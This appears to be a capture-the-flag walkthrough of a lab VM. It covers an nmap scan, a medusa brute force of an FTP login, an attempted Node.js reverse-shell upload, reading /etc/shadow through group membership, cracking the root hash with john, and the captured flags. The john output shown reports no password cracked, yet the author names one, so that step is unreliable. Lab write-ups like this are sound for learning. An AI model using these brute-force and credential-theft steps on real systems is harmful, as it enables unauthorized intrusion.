When start the VM i got machine ip

I start with a nmap scan

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.19          

Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-12 10:48 EST
Nmap scan report for 192.168.1.19
Host is up (0.0013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds

So FTP is open let’s play with FTP

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.19

Connected to 192.168.1.19.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.1.19:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

So anonymous login is not allowed but a got a username a.clark let’s brute force the password.

medusa -u a.clark -P /usr/share/wordlists/rockyou.txt -h 192.168.1.19 -M ftp

complete) Password: robert (77 of 14344391 complete)
2025-11-12 11:08:36 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: danielle (78 of 14344391 complete)
2025-11-12 11:08:39 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: forever (79 of 14344391 complete)
2025-11-12 11:08:41 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: family (80 of 14344391 complete)
2025-11-12 11:08:44 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: jonathan (81 of 14344391 complete)
2025-11-12 11:08:48 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: 987654321 (82 of 14344391 complete)
2025-11-12 11:08:51 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: computer (83 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: whatever (84 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: dragon (85 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT FOUND: [ftp] Host: 192.168.1.19 User: a.clark Password: dragon [SUCCESS]

and i found a password dragon is the password

• I login to Ftp with user a.clark and password dragon

┌──(kali㉿kali)-[~]
└─$ ftp a.clark@192.168.1.19
Connected to 192.168.1.19.
220 "Hello a.clark, Welcome to your FTP server."
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62179|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> put hello.txt
local: hello.txt remote: hello.txt
229 Entering Extended Passive Mode (|||46558|)
150 Ok to send data.
100% |*********************************************************|     6       28.58 KiB/s    00:00 ETA
226 Transfer complete.
6 bytes sent in 00:00 (2.21 KiB/s)

I can use PUT here to test this i upload a rev shell of node.js

local: rev.js remote: rev.js
229 Entering Extended Passive Mode (|||17037|)
150 Ok to send data.
100% |*********************************************************|   380        1.50 MiB/s    00:00 ETA
226 Transfer complete.
380 bytes sent in 00:00 (121.31 KiB/s)
ftp> ls -la
229 Entering Extended Passive Mode (|||57329|)
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Nov 09 22:31 .
drwxrwxrwx    2 1000     1000         4096 Nov 09 22:31 ..
-rw-------    1 1000     1000            6 Nov 09 22:27 hello.txt
-rw-------    1 1000     1000          380 Nov 09 22:31 rev.js
226 Directory send OK.
ftp> 

But i couldn’t get the rev shell but In the Vm i able to Login with these credits.

• After login i found the user is also the part of the shadow group I easily able to read the /etc/shadow file and get the root hash let’s crack this

─(kali㉿kali)-[~]
└─$ cat hash.txt
$y$j9T$9VFLJjKZix0Ugj9Yso0Cs.$z0FVk.1CCNx/YRzEmujcz6z4oVqa7YD6QyXd52JxyLD                                                                                                    
┌──(kali㉿kali)-[~]
└─$ john --format=crypt hash.txt --wordlist=wordlist.txt                    

Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 96 needed for performance.
0g 0:00:00:00 DONE (2025-11-13 02:04) 0g/s 100.0p/s 100.0c/s 100.0C/s bassman
Session completed. 

and the password is bassman let’s change the user to root

• got the user and root flag both

user = 9f903bRed3aac03f

root = 97b7922RED3e350241

Happy Hacking!